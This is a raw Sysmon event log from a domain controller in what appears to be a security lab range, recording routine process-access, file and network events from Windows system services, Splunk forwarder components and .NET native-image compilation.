10341000x800000000000000019375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A147-60D3-D002-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
154100x800000000000000019373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.668{4DB9351A-A147-60D3-D002-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
23542300x800000000000000019372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.508{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB2A433C4C86824C18ABE3A92273461B,SHA256=A019EC64B9A8ED1D6F9E3BA57256156103FCAF2DB94891C32D945DF000F2ADD2,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.289{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14F77F4CC462BEEACF1752CD19BF64CE,SHA256=6743C940056E34B46018B61BEFC8A9B86D2E3B44DA0D67492A17D2B0D0AFBA53,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:00.680{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DEAFF50E77C549DDE8560A676982DB7,SHA256=FE74D0E66993713C5B29E2B5F3FF4232F58E399A082CBBEF7E01703282EFD2EA,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:00.524{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33DCDF2A01FE80C53F0A17454334C18,SHA256=BE6D2133873B8D79474FEEAD2F56FFC87E52A01E7F2E2CCB7256E06D6FC98F7D,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:01.570{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3705B70C0014C6364C351FB8426A7DE0,SHA256=C9757CBAAFC84BB71257CA941433298098BB605D0F7F90B08565CB2F2E496BC9,IMPHASH=00000000000000000000000000000000falsetrue
10341000x800000000000000019383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:01.320{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.914{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14A-60D3-D202-00000000CF01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.899{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14A-60D3-D202-00000000CF01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.899{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14A-60D3-D202-00000000CF01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.758{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14A-60D3-D102-00000000CF01}6660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.742{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14A-60D3-D102-00000000CF01}6660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.742{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14A-60D3-D102-00000000CF01}6660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000019388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.602{4DB9351A-A146-60D3-CF02-00000000CF01}5568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\O5H6Z3HL3W\System.Workflow.ComponentModel.ni.dll.auxMD5=688C6CF4A929D6B6A46AA0D20C3C088B,SHA256=C8A8A336DD46A2D97A19F13FB8CA434335BA188F4D2C46B5D615EDDBCD7F2CA1,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.602{4DB9351A-A146-60D3-CF02-00000000CF01}5568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\O5H6Z3HL3W\System.Workflow.ComponentModel.ni.dllMD5=BAA214A5082FC7FF1F1FBA3E4E5D2F12,SHA256=AAAAC19024AF7FBAEDBF65C8E6AAE15887E3389A6D384B35EDB6DF720FBC0B22,IMPHASH=00000000000000000000000000000000truetrue
23542300x800000000000000019386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.586{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54C7FD5AA6A7BBE9A7842A7AFB7F5364,SHA256=B97DEEE0DE5139A0BEC58B09A7F0B2F9DE062EDE1FD9F817927D91C70AC5583B,IMPHASH=00000000000000000000000000000000falsetrue
11241100x800000000000000019385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:02.508{4DB9351A-A146-60D3-CF02-00000000CF01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15c0-0\System.Workflow.ComponentModel.dll2021-06-23 21:02:02.508
23542300x800000000000000019397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:03.789{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=571167D11A5615B40ABF69C3E85EE5AB,SHA256=DDF690E6B0B9E38D17F9FDAC22EB41872C59A190B8C0620C87219860FD6D69B1,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:03.601{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC8102D6110206DB48825279D1074605,SHA256=E59BE2FFC44FED8160B639F1B69FD881D4818AB74D429540FCF847411CE0331D,IMPHASH=00000000000000000000000000000000falsetrue
10341000x800000000000000019395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:03.226{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.851{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14C-60D3-D302-00000000CF01}3928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.820{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14C-60D3-D302-00000000CF01}3928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.820{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14C-60D3-D302-00000000CF01}3928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000019402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.711{4DB9351A-A14A-60D3-D202-00000000CF01}5716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GBDB416032\System.Workflow.Runtime.ni.dll.auxMD5=264F462FE9E154280590A6AAE0CD3184,SHA256=FF58B834528695687225ECE95CB46797CBA517AFA0A5745E201F7A297EB8BD84,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.711{4DB9351A-A14A-60D3-D202-00000000CF01}5716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GBDB416032\System.Workflow.Runtime.ni.dllMD5=B503C4624CD0019CF1E3AFA4566F6138,SHA256=2884AB09763C6899CF56E5F43611BB7D9B34361BFACA0766073C2C38AC6E71F7,IMPHASH=00000000000000000000000000000000truetrue
11241100x800000000000000019400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:04.648{4DB9351A-A14A-60D3-D202-00000000CF01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1654-0\System.Workflow.Runtime.dll2021-06-23 21:02:04.648
23542300x800000000000000019399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.601{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=908F335556DFAEA3F493A313C34B43A3,SHA256=C2A6AD94211327586EE1E45BFDDDACD5E71E16E05D8315D59144BEFE95FB9F0D,IMPHASH=00000000000000000000000000000000falsetrue
354300x800000000000000019398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.189{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61379-false10.0.1.12-8000-
23542300x800000000000000019410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.836{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F41147A83F94E3D94F9930A9BB01F8D1,SHA256=5786443E1616C2B9BE48AE5F9BF0AF91347F6414B74C3729151AC2B67994754C,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.617{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A87BC2B0784A144043F210C982E80118,SHA256=A7BE68D03774D272FD23A3813373898963CB8796FCA4985C0D88DF135A3B58B2,IMPHASH=00000000000000000000000000000000falsetrue
10341000x800000000000000019408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.086{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14D-60D3-D402-00000000CF01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.070{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A14D-60D3-D402-00000000CF01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.070{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14D-60D3-D402-00000000CF01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000019432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.898{4DB9351A-A14E-60D3-D802-00000000CF01}5708NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B103MU2MTZ\System.Xml.Serialization.ni.dll.auxMD5=043E8E939A54185178009B5F13EBC49E,SHA256=C5BB6496C4D722EF61AC0146A28F0A869766C5C724C34CB914235F1C13B693B9,IMPHASH=00000000000000000000000000000000falsetrue
